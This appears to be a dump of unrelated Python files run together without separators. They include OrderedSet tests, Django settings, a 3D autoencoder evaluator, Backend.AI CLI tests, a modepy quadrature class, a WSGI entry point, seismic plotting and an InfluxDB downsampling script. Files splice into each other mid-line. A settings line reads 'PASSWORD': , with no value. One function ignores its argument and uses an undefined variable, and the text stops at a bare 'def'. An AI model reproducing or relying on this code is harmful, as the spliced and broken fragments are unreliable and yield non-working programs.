myia.utils.orderedset import OrderedSet class TestOrderedset(unittest.TestCase): def setUp(self): self.lst = list(range(10)) def test_add_new(self): oset = OrderedSet(self.lst) lst = self.lst item = 10 lst.append(item) oset.add(item) self.assertEqual(list(oset), lst) def test_add_existing(self): oset = OrderedSet(self.lst) lst = self.lst oset.add(1) oset.add(3) self.assertEqual(list(oset), lst) def test_discard(self): oset = OrderedSet([1, 2, 3]) oset.discard(1) self.assertNotIn(1, oset) oset.discard(4) def test_pop(self): oset = OrderedSet([1, 2, 3]) v = oset.pop() self.assertEqual(v, 3) self.assertNotIn(v, oset) def test_remove(self): oset = OrderedSet(self.lst) lst = self.lst oset.remove(3) lst.remove(3) self.assertEqual(list(oset), lst) def test_clear(self): val = frozenset([1]) oset = OrderedSet() ws = weakref.WeakKeyDictionary() oset.add(val) ws[val] = 1 oset.clear() self.assertEqual(list(oset), []) del val gc.collect() self.assertEqual(list(ws), []) def test_copy(self): oset1 = OrderedSet(self.lst) oset2 = oset1.copy() self.assertIsNot(oset1, oset2) self.assertEqual(oset1, oset2) oset1.clear() self.assertNotEqual(oset1, oset2) def test_reduce(self): oset = OrderedSet(self.lst) oset2 = copy.deepcopy(oset) self.assertEqual(oset, oset2) oset3 = pickle.loads(pickle.dumps(oset)) self.assertEqual(oset, oset3) oset.add(-1) self.assertNotEqual(oset, oset2) def test_difference_and_update(self): oset1 = OrderedSet([1, 2, 3]) oset2 = OrderedSet([3, 4, 5]) oset3 = oset1 - oset2 self.assertEqual(oset3, OrderedSet([1, 2])) self.assertEqual(oset1.difference(oset2), oset3) oset4 = oset1.copy() oset4 -= oset2 self.assertEqual(oset4, oset3) oset5 = oset1.copy() oset5.difference_update(oset2) self.assertEqual(oset5, oset3) def test_intersection_and_update(self): oset1 = OrderedSet([1, 2, 3]) oset2 = OrderedSet([3, 4, 5]) oset3 = oset1 & oset2 self.assertEqual(oset3, OrderedSet([3])) oset4 = oset1.copy() oset4 &= oset2 self.assertEqual(oset4, oset3) oset5 = oset1.copy() 
oset5.intersection_update(oset2) self.assertEqual(oset5, oset3) def test_issubset(self): oset1 = OrderedSet([1, 2, 3]) oset2 = OrderedSet([1, 2]) self.assertTrue(oset2 < oset1) self.assertTrue(oset2.issubset(oset1)) oset2 = OrderedSet([1, 2, 3]) self.assertTrue(oset2 <= oset1) self.assertTrue(oset1 <= oset2) self.assertTrue(oset2.issubset(oset1)) oset2 = OrderedSet([1, 2, 3, 4]) self.assertFalse(oset2 < oset1) self.assertFalse(oset2.issubset(oset1)) self.assertTrue(oset1 < oset2) # issubset compares underordered for all sets oset2 = OrderedSet([4, 3, 2, 1]) self.assertTrue(oset1 < oset2) def test_issuperset(self): oset1 = OrderedSet([1, 2, 3]) oset2 = OrderedSet([1, 2]) self.assertTrue(oset1 > oset2) self.assertTrue(oset1.issuperset(oset2)) oset2 = OrderedSet([1, 2, 3]) self.assertTrue(oset1 >= oset2) self.assertTrue(oset2 >= oset1) self.assertTrue(oset1.issubset(oset2)) oset2 = OrderedSet([1, 2, 3, 4]) self.assertFalse(oset1 > oset2) self.assertFalse(oset1.issuperset(oset2)) self.assertTrue(oset2 > oset1) # issubset compares underordered for all sets oset2 = OrderedSet([4, 3, 2, 1]) self.assertTrue(oset2 > oset1) def test_symmetric_difference_and_update(self): oset1 = OrderedSet([1, 2, 3]) oset2 = OrderedSet([2, 3, 4]) oset3 = oset1 ^ oset2 self.assertEqual(oset3, OrderedSet([1, 4])) oset4 = oset1.copy() self.assertEqual(oset4.symmetric_difference(oset2), oset3) oset4 ^= oset2 self.assertEqual(oset4, oset3) oset5 = oset1.copy() oset5.symmetric_difference_update(oset2) self.assertEqual(oset5, oset3) def test_union_and_update(self): oset = OrderedSet(self.lst) lst = self.lst oset2 = oset.union([3, 9, 27]) self.assertEqual(oset2, OrderedSet(lst + [27])) # make sure original oset isn't changed self.assertEqual(oset, OrderedSet(lst)) oset1 = OrderedSet(self.lst) oset2 = OrderedSet(self.lst) oset3 = oset1 | oset2 self.assertEqual(oset3, oset1) self.assertEqual(oset3, oset1.union(oset2)) oset1 |= OrderedSet("abc") self.assertEqual(oset1, oset2.union("abc")) oset1 = OrderedSet(self.lst) oset1.update("abc") self.assertEqual(oset1, oset2.union("abc")) def test_union_with_iterable(self): oset1 = OrderedSet([1]) self.assertEqual(oset1.union([2, 1]), OrderedSet([1, 2])) self.assertEqual( OrderedSet([1, 2]) | OrderedSet([3, 1, 2, 4]), OrderedSet([1, 2, 3, 4]), ) # union with unordered set should work, # though the order will be arbitrary self.assertEqual(oset1.union(set([2])), OrderedSet([1, 2])) def test_symmetric_difference_with_iterable(self): oset1 = OrderedSet([1]) self.assertEqual(oset1.symmetric_difference([1]), OrderedSet([])) self.assertEqual( OrderedSet([3, 1, 4, 2]).symmetric_difference([3, 4]), OrderedSet([1, 2]), ) self.assertEqual( OrderedSet([3, 1, 4, 2]).symmetric_difference(set([3, 4])), OrderedSet([1, 2]), ) def test_intersection_with_iterable(self): self.assertEqual( OrderedSet([3, 2]).intersection([1, 2, 3]), OrderedSet([2, 3]) ) def test_difference_with_iterable(self): self.assertEqual( OrderedSet([1, 2, 3, 4]).difference([3, 2]), OrderedSet([1, 4]) ) def test_isdisjoint(self): self.assertTrue(OrderedSet().isdisjoint(OrderedSet())) self.assertTrue(OrderedSet([1]).isdisjoint(OrderedSet([2]))) self.assertFalse(OrderedSet([1, 2]).isdisjoint(OrderedSet([2, 3]))) def test_len(self): oset = OrderedSet(self.lst) self.assertEqual(len(oset), len(self.lst)) oset.remove(0) self.assertEqual(len(oset), len(self.lst) - 1) def test_contains(self): oset = OrderedSet(self.lst) self.assertTrue(1 in oset) def test_iter_mutated(self): oset = OrderedSet(self.lst) it = iter(oset) oset.add("a") with 
self.assertRaises(RuntimeError): next(it) def test_iter_and_valid_order(self): oset = OrderedSet(self.lst) self.assertEqual(list(oset), self.lst) oset = OrderedSet(self.lst + self.lst) self.assertEqual(list(oset), self.lst) def test_repr(self): oset = OrderedSet([1]) self.assertEqual(repr(oset), "OrderedSet([1])") def test_eq(self): oset1 = OrderedSet(self.lst) oset2 = OrderedSet(self.lst) self.assertNotEqual(oset1, None) self.assertEqual(oset1, oset2) def test_ordering(self): oset1 = OrderedSet(self.lst) oset2 = OrderedSet(self.lst) if sys.version_info < (3, 0): self.assertFalse(oset1 <= None) self.assertLessEqual(oset2, oset1) self.assertLessEqual(oset2, set(oset1)) self.assertLessEqual(oset2, list(oset1)) self.assertGreaterEqual(oset1, oset2) self.assertGreaterEqual(oset1, set(oset2)) self.assertGreaterEqual(oset1, list(oset2)) oset3 = OrderedSet(self.lst[:-1]) self.assertLess(oset3, oset1) self.assertLess(oset3, set(oset1)) self.assertLess(oset3, list(oset1)) self.assertGreater(oset1, oset3) self.assertGreater(oset1, set(oset3)) self.assertGreater(oset1, list(oset3)) from base_settings import * from prod_secrets import PSQLPW DEBUG = False ALLOWED_HOSTS = ["ADDALLOWEDHOSTSHERE"] DATABASES = { 'default': { 'ENGINE': 'django.db.backends.postgresql_psycopg2', 'NAME': 'sample_db', 'USER': 'sample_db_user', 'PASSWORD': , 'HOST': 'localhost', 'PORT': '', 'TEST': { 'NAME': 'sample_db_test', } } } WEBPACK_LOADER = { 'DEFAULT': { 'BUNDLE_DIR_NAME': 'bundles/', 'STATS_FILE': os.path.join(BASE_DIR, 'webpack/webpack-stats.json'), } }n = int(input()) for i in range(2, n): if n % i == 0: print('NO') break else: print('YES') """concatenating list using +""" # a = [1, 2, 3] # b = [4, 5, 6] # c = a + b # print(a, b) # print(c) '''lists can be sliced using ":" ''' # # remember: just like in strings, the second number is "up to but not including" # t = [9, 41, 12, 3, 74, 15] # print(t) # print(t[1:3]) # print(t[:4]) # print(t[3:]) # print(t[:]) '''list methods''' # x = list() # print(type(x)) # # documentation: "dir()" # print(dir(x)) '''building a list from scratch''' # # make an empty list # stuff = list() # print(stuff) # stuff.append('book') # stuff.append(99) # print(stuff) # stuff.append('cookie') # print(stuff) '''is something in a list?''' # some = [1, 9, 21, 10, 16] # x = 20 # print('Is', x, 'in the list?\nR:', x in some) '''lists are in order''' # friends = ['Joseph', 'Glenn', 'Sally'] # print(friends) # # sort alphabetically # friends.sort() # print(friends) '''built-in functions and lists''' # nums = [3, 41, 12, 9, 74, 15] # print('Len',len(nums)) # print('Max',max(nums)) # print('Min',min(nums)) # print('Sum',sum(nums)) # print('Avg',sum(nums)/len(nums)) '''average examples''' # total = 0 # count = 0 # while True : # inp = input('Enter a number: ') # Have to continue!import argparse import numpy as np import tensorflow as tf from sklearn.metrics.pairwise import cosine_similarity from lib.model import conv_autoencoder_3d from lib.utils import load_data from lib.utils import calculate_average_precision from lib.visualize import visualize, visualize_3d_iodata, visualize_tsne def parse_args(): parser = argparse.ArgumentParser(description='Evaluate 3D Convolutional AutoEncoder') parser.add_argument('--learning_rate', default=1e-4, type=float, help='learning rate of optimizer') parser.add_argument('--data_path', default='./data/modelnet10.npz', type=str, help='path to dataset to evaluate') parser.add_argument('--use_exist_modelout', default=False, type=bool, help='whether to use existing model 
output in npz. If False, model evaluation will be done again') parser.add_argument('--modelout_save', default=False, type=bool, help='whether to save model output') parser.add_argument('--checkpoint_dir', default='./checkpoint', type=str, help='path to directory to checkpoint') parser.add_argument('--modeleval_out_dir', default='./output.npz', type=str, help='path to directory to save and load model evaluation output') parser.add_argument('--num_search_sample', default=1, type=int, help='the number of samples to search') parser.add_argument('--num_top_similarity', default=4, type=int, help='search top k similarity data') args = parser.parse_args() return args def similarity_search(encoded, k): """ caluculate similarity between encoded data for each row. run similar data search based on cosine similarity and return similar data index and similarity """ mat = cosine_similarity(encoded) # top k index idx = np.argsort(mat)[:, ::-1] sims = np.array([mat[i][d] for i, d in enumerate(idx)]) # return top 2 ~ k + 1 index and similarity since top 1 will be the self-data. return idx[:, 1:k + 1], sims[:, 1:k+1] def main(): # Prepare parameters args = parse_args() checkpoint_dir = args.checkpoint_dir data_path = args.data_path num_top_similarity = args.num_top_similarity num_search_sample = args.num_search_sample modelout_save = args.modelout_save use_exist_modelout = args.use_exist_modelout modeleval_out_dir = args.modeleval_out_dir # Prepare Data _, _, x_test, y_test = load_data(data_path=data_path) input_data = tf.placeholder(tf.float32, shape=[None, 32, 32, 32], name='input') net_input = input_data[:, :, :, :, np.newaxis] CAE_3D = conv_autoencoder_3d(net_input, args=args, is_training=False) if use_exist_modelout: data = np.load(modeleval_out_dir) idx = data['idx'] sims = data['sims'] encoded = data['encoded'] decoded = data['decoded'] else: with tf.Session() as sess: saver = tf.train.Saver() saver.restore(sess, tf.train.latest_checkpoint(checkpoint_dir)) feed_dict = {input_data: x_test} # extract encoded features and vectorize them encoded = CAE_3D.encoded.eval(session=sess, feed_dict=feed_dict) nd, k1, k2, k3, k4 = encoded.shape encoded = np.reshape(encoded, (nd, k1 * k2 * k3 * k4)) decoded = CAE_3D.decoded.eval(session=sess, feed_dict=feed_dict) idx, sims = similarity_search(encoded, num_top_similarity) if modelout_save: np.savez_compressed(modeleval_out_dir, idx=idx, sims=sims, encoded=encoded, decoded=decoded) # visualize encoded data with t-SNE # visualize_tsne(encoded, y_test) # add self-index as the first column self_idx = np.arange(encoded.shape[0]).reshape((encoded.shape[0], 1)) idx = np.concatenate([self_idx, idx], axis=1) # select samples to visualize randomly sample_idx = np.random.randint(0, x_test.shape[0], num_search_sample) # visualize similar search result visualize(x_test, y_test, idx[sample_idx]) # visualize input and its decoded data # visualize_3d_iodata(x_test[sample_idx], decoded[sample_idx], y_test[sample_idx]) # calculate average precision ap = calculate_average_precision(y_test, idx[sample_idx], sims[sample_idx], num_search_sample) print('Average Precision per sample : ', ap) if __name__ == '__main__': main() """Test the XTP class.""" import os from pathlib import Path from pyvotca import DFTGWBSE, Molecule from .utils import PATH_TEST def test_upgrade(): """Check the mergin between the defauls and the user input.""" os.environ["VOTCASHARE"] = PATH_TEST.absolute().as_posix() # Molecule definition mol = Molecule().read_xyz_file(PATH_TEST / "ethylene.xyz") user_options = { 
'functional': 'PBE', 'basisset': 'cc-pvtz', "dftpackage": {"package": {"name": "orca", "executable": "Path/to/Orca"}}, "gwbse_engine": {"gwbse_options": {"gwbse": {"mode": 'G0W0'}}} } file = Path("dftgwbse.xml") try: votca = DFTGWBSE(mol, options=user_options) votca.update_options() assert file.exists() finally: if file.exists(): os.remove(file) import json from contextlib import closing from ...utils.cli import EOF, ClientRunnerFunc def test_add_keypair_resource_policy(run: ClientRunnerFunc): print("[ Add keypair resource policy ]") # Add keypair resource policy add_arguments = [ 'admin', 'keypair-resource-policy', 'add', '--default-for-unspecified', 'LIMITED', '--total-resource-slots', '{}', '--max-concurrent-sessions', '20', '--max-containers-per-session', '2', '--max-vfolder-count', '15', '--max-vfolder-size', '0', '--allowed-vfolder-hosts', 'local:volume1', '--idle-timeout', '1200', 'test_krp', ] with closing(run(add_arguments)) as p: p.expect(EOF) assert 'Keypair resource policy test_krp is created.' in p.before.decode(), \ 'Keypair resource policy creation not successful' # Check if keypair resource policy is created with closing(run(['--output=json', 'admin', 'keypair-resource-policy', 'list'])) as p: p.expect(EOF) decoded = p.before.decode() loaded = json.loads(decoded) krp_list = loaded.get('items') assert isinstance(krp_list, list), 'Keypair resource policy list not printed properly' test_krp = get_keypair_resource_policy_from_list(krp_list, 'test_krp') assert bool(test_krp), 'Test keypair resource policy doesn\'t exist' assert test_krp.get('total_resource_slots') == '{}', 'Test keypair resource policy total resource slot mismatch' assert test_krp.get('max_concurrent_sessions') == 20, 'Test keypair resource policy max concurrent session mismatch' assert test_krp.get('max_vfolder_count') == 15, 'Test keypair resource policy max vfolder count mismatch' assert test_krp.get('max_vfolder_size') == '0 Bytes', 'Test keypair resource policy max vfolder size mismatch' assert test_krp.get('idle_timeout') == 1200, 'Test keypair resource policy idle timeout mismatch' assert test_krp.get('max_containers_per_session') == 2,\ 'Test keypair resouce policy max containers per session mismatch' assert test_krp.get('allowed_vfolder_hosts') == ['local:volume1'], \ 'Test keypair resource policy allowed vfolder hosts mismatch' def test_update_keypair_resource_policy(run: ClientRunnerFunc): print("[ Update keypair resource policy ]") # Update keypair resource policy add_arguments = [ 'admin', 'keypair-resource-policy', 'update', '--default-for-unspecified', 'UNLIMITED', '--total-resource-slots', '{}', '--max-concurrent-sessions', '30', '--max-containers-per-session', '1', '--max-vfolder-count', '10', '--max-vfolder-size', '0', '--allowed-vfolder-hosts', 'local:volume2', '--idle-timeout', '1800', 'test_krp', ] with closing(run(add_arguments)) as p: p.expect(EOF) assert 'Update succeeded.' 
in p.before.decode(), 'Keypair resource policy update not successful' # Check if keypair resource policy is updated with closing(run(['--output=json', 'admin', 'keypair-resource-policy', 'list'])) as p: p.expect(EOF) decoded = p.before.decode() loaded = json.loads(decoded) krp_list = loaded.get('items') assert isinstance(krp_list, list), 'Keypair resource policy list not printed properly' test_krp = get_keypair_resource_policy_from_list(krp_list, 'test_krp') assert bool(test_krp), 'Test keypair resource policy doesn\'t exist' assert test_krp.get('total_resource_slots') == '{}', 'Test keypair resource policy total resource slot mismatch' assert test_krp.get('max_concurrent_sessions') == 30, 'Test keypair resource policy max concurrent session mismatch' assert test_krp.get('max_vfolder_count') == 10, 'Test keypair resource policy max vfolder count mismatch' assert test_krp.get('max_vfolder_size') == '0 Bytes', 'Test keypair resource policy max vfolder size mismatch' assert test_krp.get('idle_timeout') == 1800, 'Test keypair resource policy idle timeout mismatch' assert test_krp.get('max_containers_per_session') == 1,\ 'Test keypair resouce policy max containers per session mismatch' assert test_krp.get('allowed_vfolder_hosts') == ['local:volume2'], \ 'Test keypair resource policy allowed vfolder hosts mismatch' def test_delete_keypair_resource_policy(run: ClientRunnerFunc): print("[ Delete keypair resource policy ]") # Delete keypair resource policy with closing(run(['admin', 'keypair-resource-policy', 'delete', 'test_krp'])) as p: p.sendline('y') p.expect(EOF) assert 'Resource policy test_krp is deleted.' in p.before.decode(), 'Keypair resource policy deletion failed' def test_list_keypair_resource_policy(run: ClientRunnerFunc): print("[ List keypair resource policy ]") with closing(run(['--output=json', 'admin', 'keypair-resource-policy', 'list'])) as p: p.expect(EOF) decoded = p.before.decode() loaded = json.loads(decoded) krp_list = loaded.get('items') assert isinstance(krp_list, list), 'Keypair resource policy list not printed properly' def get_keypair_resource_policy_from_list(krps: list, name: str) -> dict: for krp in krps: if krp.get('name') == name: return krp return {} inducer/modepy __copyright__ = "Copyright (C) 2009-2013 " __license__ = """ Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
""" import numpy as np from modepy.quadrature import Quadrature, QuadratureRuleUnavailable class VioreanuRokhlinSimplexQuadrature(Quadrature): """Simplicial quadratures with symmetric node sets and positive weights suitable for well-conditioned interpolation. The integration domain is the unit simplex. (see :ref:`tri-coords` and :ref:`tet-coords`) Raises :exc:`modepy.QuadratureRuleUnavailable` if no quadrature rule for the requested parameters is available. Inherits from :class:`modepy.Quadrature`. See there for the interface to obtain nodes and weights. .. attribute:: exact_to The total degree up to which the quadrature is exact. When using these nodes, please acknowledge Zydrunas Gimbutas, who generated them as follows: * The 2D nodes are based on the interpolation node set derived in the article and , "Spectra of Multiplication Operators as a Numerical Tool," `Yale CS Tech Report 1443 `_ Note that in Vioreanu's tables, only orders 5,6,9, and 12 are rotationally symmetric, which gives one extra order for integration and better interpolation conditioning. Also note that since the tables have been re-generated independently, the nodes and weights may be different. * The 3D nodes were derived from the :func:`modepy.warp_and_blend_nodes`. * A tightening algorithm was then applied, as described in , "Spectra of Multiplication Operators as a Numerical Tool", Yale University, 2012. `Dissertation `_ .. versionadded :: 2013.3 .. automethod:: __init__ .. automethod:: __call__ """ # FIXME: most other functionality in modepy uses 'dims, order' as the # argument order convention. def __init__(self, order, dims): """ :arg order: The total degree to which the quadrature rule is exact for *interpolation*. :arg dims: The number of dimensions for the quadrature rule. 2 for quadrature on triangles and 3 for tetrahedra. """ if dims == 2: from modepy.quadrature.vr_quad_data_tri import triangle_data as table ref_volume = 2 elif dims == 3: from modepy.quadrature.vr_quad_data_tet import tetrahedron_data as table ref_volume = 4/3 else: raise QuadratureRuleUnavailable(f"invalid domension: '{dims}'") from modepy.tools import EQUILATERAL_TO_UNIT_MAP e2u = EQUILATERAL_TO_UNIT_MAP[dims] try: order_table = table[order] except KeyError: raise QuadratureRuleUnavailable nodes = e2u(order_table["points"]) wts = order_table["weights"] wts = wts * (ref_volume/np.sum(wts)) super().__init__(nodes, wts, exact_to=order_table["quad_degree"]) src/servicelib/wsgi.py # (C) Copyright 2020- ECMWF. # # This software is licensed under the terms of the Apache Licence Version 2.0 # which can be obtained at http://www.apache.org/licenses/LICENSE-2.0. # # In applying this licence, ECMWF does not waive the privileges and immunities # granted to it by virtue of its status as an intergovernmental organisation # nor does it submit to any jurisdiction. """WSGI entry point module for servicelib workers.""" from __future__ import absolute_import, unicode_literals import atexit import os import falcon from servicelib import config, inventory, logutils, registry from servicelib.compat import raise_from from servicelib.falcon import HealthResource, StatsResource, WorkerResource __all__ = [ "application", ] # On y va! 
logutils.configure_logging( level=config.get("log.level", default="debug").upper(), log_type=config.get("log.type", default="text"), ) application = falcon.API(media_type=falcon.MEDIA_JSON) try: services = inventory.instance().load_services() application.add_route("/services/{service}", WorkerResource(services)) # Now that routes for services have been set up, we may add the services we # host here to the service registry. worker_hostname = config.get("worker.hostname") worker_port = config.get("worker.port") service_urls = [ (name, "http://{}:{}/services/{}".format(worker_hostname, worker_port, name,),) for name in services ] registry.instance().register(service_urls) # Now that routes for services have been set up, we are ready to # handle requests. Let Kubernetes know (or whoever may be sending # health check probes) by enabling the health check route. application.add_route("/health", HealthResource()) # When we die, try reporting it to the registry. @atexit.register def unregister(): registry.instance().unregister(service_urls) application.add_route("/stats", StatsResource()) except Exception as exc: # If we're running under `pytest-cov`, call `pytest_cov.embed.cleanup()` # so that we do not lose coverage info for this Python module. if os.environ.get("COV_CORE_DATAFILE"): # pragma: no branch from pytest_cov.embed import cleanup cleanup() raise_from(exc, exc) # pragma: no cover GeoCode-polymtl/Deep_1D_velocity from vrmslearn.ModelParameters import ModelParameters from vrmslearn.SeismicGenerator import SeismicGenerator, mute_direct import argparse import matplotlib.pyplot as plt import numpy as np import os from shutil import rmtree import h5py as h5 def plot_two_gathers(data1, data2, pars): """ Compares two shot gathers @params: @returns: """ # Plot results fig, ax = plt.subplots(1, 2, figsize=[16, 8]) clip = 0.1 vmax = np.max(data1) * clip vmin = -vmax ax[0].imshow(data1, interpolation='bilinear', cmap=plt.get_cmap('Greys'), vmin=vmin, vmax=vmax, aspect='auto') clip = 0.1 vmax = np.max(data2) * clip vmin = -vmax ax[1].imshow(data2, interpolation='bilinear', cmap=plt.get_cmap('Greys'), vmin=vmin, vmax=vmax, aspect='auto') plt.show() def plot_two_traces(data1, data2, pars): """ Compares two shot gathers @params: @returns: """ # Plot results fig, ax = plt.subplots(2, 1, figsize=[16, 8]) clip = 0.1 vmax = np.max(data1) * clip vmin = -vmax ax[0].plot(data1[:,1]) ax[1].plot(data2[:,1]) plt.show() if __name__ == "__main__": parser = argparse.ArgumentParser() # Add arguments to parse parser.add_argument("-f1", "--filename1", type=str, default="", help="name of the file containing the synth data") parser.add_argument("-f2", "--filename2", type=str, default="", help="name of the file containing the real data") # Parse the input args = parser.parse_args() def print_usage_error_message(): print("\nUsage error.\n") parser.print_help() pars = ModelParameters() pars.dh = 6.25 pars.peak_freq = 26 pars.NX = 692 * 2 pars.NZ = 752 * 2 pars.dt = 0.0004 pars.NT = int(8.0 / pars.dt) pars.resampling = 10 pars.dg = 8 pars.gmin = int(470 / pars.dh) pars.gmax = int((470 + 72 * pars.dg * pars.dh) / pars.dh) pars.minoffset = 470 pars.vp_min = 1300.0 # maximum value of vp (in m/s) pars.vp_max = 4000.0 # minimum value of vp (in m/s) pars.marine = True pars.velwater = 1500 pars.d_velwater = 60 pars.water_depth = 3500 pars.dwater_depth = 1000 pars.fs = False pars.source_depth = (pars.Npad + 4) * pars.dh pars.receiver_depth = (pars.Npad + 4) * pars.dh pars.identify_direct = False file = h5.File(args.filename1, "r") 
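    # Read the synthetic shot gather and its velocity model from the HDF5 file
    # (datasets named 'data' and 'vp'), then mute the direct arrival using the
    # shallowest velocity vp[0] -- presumably the water velocity, since pars.marine is True.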
data1 = file['data'][:] vp = file['vp'][:] data1 = mute_direct(data1, vp[0], pars) file.close() file = h5.File(args.filename2, "r") data2 = file["data_cmp"][:data1.shape[0], 1:72] file.close() plot_two_gathers(data1, data2, pars) plot_two_traces(data1, data2, pars) # 从excel读入数据存为data import pandas as pd import numpy as np data = pd.read_excel('../data/questionnaire2.xlsx', sheet_name=1) # data = pd.read_excel('../data/all.xlsx', sheet_name=0) print(data.head()) print(len(data.index.values)) print(len(data.columns.values)) data_array = np.array(data) print(data_array.shape[0], data_array.shape[1]) print(data_array) np.save('../data/q2_label.npy', data_array) import argparse from influxdb import InfluxDBClient import pandas as pd from time import sleep, time SELECT_REQUESTS_DATA = 'select response_time, request_name, method, status, status_code from {} ' \ 'where time>\'{}\'' SELECT_USERS_DATA = 'select active from "users" where time>\'{}\'' def get_args(): parser = argparse.ArgumentParser(description='Simlog parser.') parser.add_argument("-t", "--type", help="Test type.") parser.add_argument("-s", "--simulation", help='Test simulation', default=None) parser.add_argument("-b", "--build_id", help="build ID", default=None) parser.add_argument("-en", "--env", help="Test type.", default=None) parser.add_argument("-i", "--influx_host", help='InfluxDB host or IP', default=None) parser.add_argument("-p", "--influx_port", help='InfluxDB port', default=8086) parser.add_argument("-iu", "--influx_user", help='InfluxDB user', default="") parser.add_argument("-ip", "--influx_password", help='InfluxDB password', default="") parser.add_argument("-idb", "--influx_db", help='Test results InfluxDB', default="jmeter") parser.add_argument("-l", "--lg_id", help='Load generator ID', default=None) return vars(parser.parse_args()) def resample_results(requests, aggregation, status): downsampled_array = [] start_time_ = time() for req in requests: _response_times = [0 if v is None else v for v in requests[req]["response_times"]] dti = pd.to_datetime(requests[req]["timestamps"]) rt_ts = pd.Series(_response_times, index=dti) total = rt_ts.resample(aggregation, label='right').count() min_ = rt_ts.resample(aggregation, label='right').min() max_ = rt_ts.resample(aggregation, label='right').max() median = rt_ts.resample(aggregation, label='right').median() pct_90 = rt_ts.resample(aggregation, label='right').quantile(0.9) pct_95 = rt_ts.resample(aggregation, label='right').quantile(0.95) pct_99 = rt_ts.resample(aggregation, label='right').quantile(0.99) status_codes = {} for status_code in ["1xx", "2xx", "3xx", "4xx", "5xx", "NaN"]: sc_ts = pd.Series(requests[req][status_code], index=dti) status_codes[status_code] = sc_ts.resample(aggregation, label='right').sum() _timestamps = list(total.keys()) for i in range(len(total)): try: if int(total.iloc[i]) != 0: downsampled_array.append({ "time": _timestamps[i].to_pydatetime().strftime('%Y-%m-%dT%H:%M:%SZ'), "request_name": requests[req]["request_name"], "method": requests[req]["method"], "status": status, "total": total.iloc[i], "min": int(min_.iloc[i]), "max": int(max_.iloc[i]), "median": int(median.iloc[i]), "pct90": int(pct_90.iloc[i]), "pct95": int(pct_95.iloc[i]), "pct99": int(pct_99.iloc[i]), "1xx": status_codes["1xx"].iloc[i], "2xx": status_codes["2xx"].iloc[i], "3xx": status_codes["3xx"].iloc[i], "4xx": status_codes["4xx"].iloc[i], "5xx": status_codes["5xx"].iloc[i], "NaN": status_codes["NaN"].iloc[i], }) except Exception: pass print(f"Downsampling time for 
{aggregation} - {round(time() - start_time_, 2)} seconds") return downsampled_array def resample_and_send_to_influx(client, args, ok_requests, ko_requests, aggregation, iteration): requests = resample_results(ok_requests, aggregation, "OK") requests.extend(resample_results(ko_requests, aggregation, "KO")) points = [] for req in requests: sampler_type = "TRANSACTION" if req['method'] == "TRANSACTION" else "REQUEST" influx_record = { "measurement": f"{args['simulation']}_{aggregation.replace('T', 'm').lower()}", "tags": { "iteration": iteration, "simulation": args['simulation'], "env": args['env'], "test_type": args['type'], "build_id": args['build_id'], "lg_id": args['lg_id'], "request_name": req['request_name'], "method": req['method'], "sampler_type": sampler_type, }, "time": req["time"], "fields": { "total": req["total"], "status": req["status"], "1xx": req["1xx"], "2xx": req["2xx"], "3xx": req["3xx"], "4xx": req["4xx"], "5xx": req["5xx"], "NaN": req["NaN"], "min": req["min"], "max": req["max"], "median": req["median"], "pct90": req["pct90"], "pct95": req["pct95"], "pct99": req["pct99"], } } points.append(influx_record) client.write_points(points) def resample_users_and_send_to_influx(client, args, users_data, aggregation): downsampled_array = [] users_ts = pd.Series(users_data["active"], index=pd.to_datetime(users_data["timestamps"])) active = users_ts.resample(aggregation, label='right').max() _timestamps = list(active.keys()) for i in range(len(active)): try: downsampled_array.append({ "time": _timestamps[i].to_pydatetime().strftime('%Y-%m-%dT%H:%M:%SZ'), "active": int(active.iloc[i]), }) except Exception: pass points = [] for _each in downsampled_array: influx_record = { "measurement": f"users_{aggregation.replace('T', 'm').lower()}", "tags": { "simulation": args['simulation'], "env": args['env'], "test_type": args['type'], "build_id": args['build_id'], "lg_id": args['lg_id'], }, "time": _each["time"], "fields": { "active": _each["active"], } } points.append(influx_record) client.write_points(points) def aggregate_results(_results): _ok_requests = {} _ko_requests = {} for each in requests_data: if each["status"] == "OK": append_request(_ok_requests, each) else: append_request(_ko_requests, each) return _ok_requests, _ko_requests def append_request(requests, req): key = f"{req['request_name']}_{req['method']}" if key not in requests: requests[key] = { "timestamps": [req["time"]], "request_name": req["request_name"], "method": req["method"], "response_times": [req["response_time"]], "1xx": [], "2xx": [], "3xx": [], "4xx": [], "5xx": [], 'NaN': [] } if "{}xx".format(str(req['status_code'])[0]) in requests[key]: requests[key]["NaN"].append(0) for status_code in ["1xx", "2xx", "3xx", "4xx", "5xx"]: if status_code[0] == str(req['status_code'])[0]: requests[key][status_code].append(1) else: requests[key][status_code].append(0) else: requests[key]["NaN"].append(1) for status_code in ["1xx", "2xx", "3xx", "4xx", "5xx"]: requests[key][status_code].append(0) else: requests[key]["timestamps"].append(req["time"]) requests[key]["response_times"].append(req["response_time"]) if "{}xx".format(str(req['status_code'])[0]) in requests[key]: requests[key]["NaN"].append(0) for status_code in ["1xx", "2xx", "3xx", "4xx", "5xx"]: if status_code[0] == str(req['status_code'])[0]: requests[key][status_code].append(1) else: requests[key][status_code].append(0) else: requests[key]["NaN"].append(1) for status_code in ["1xx", "2xx", "3xx", "4xx", "5xx"]: requests[key][status_code].append(0) def 
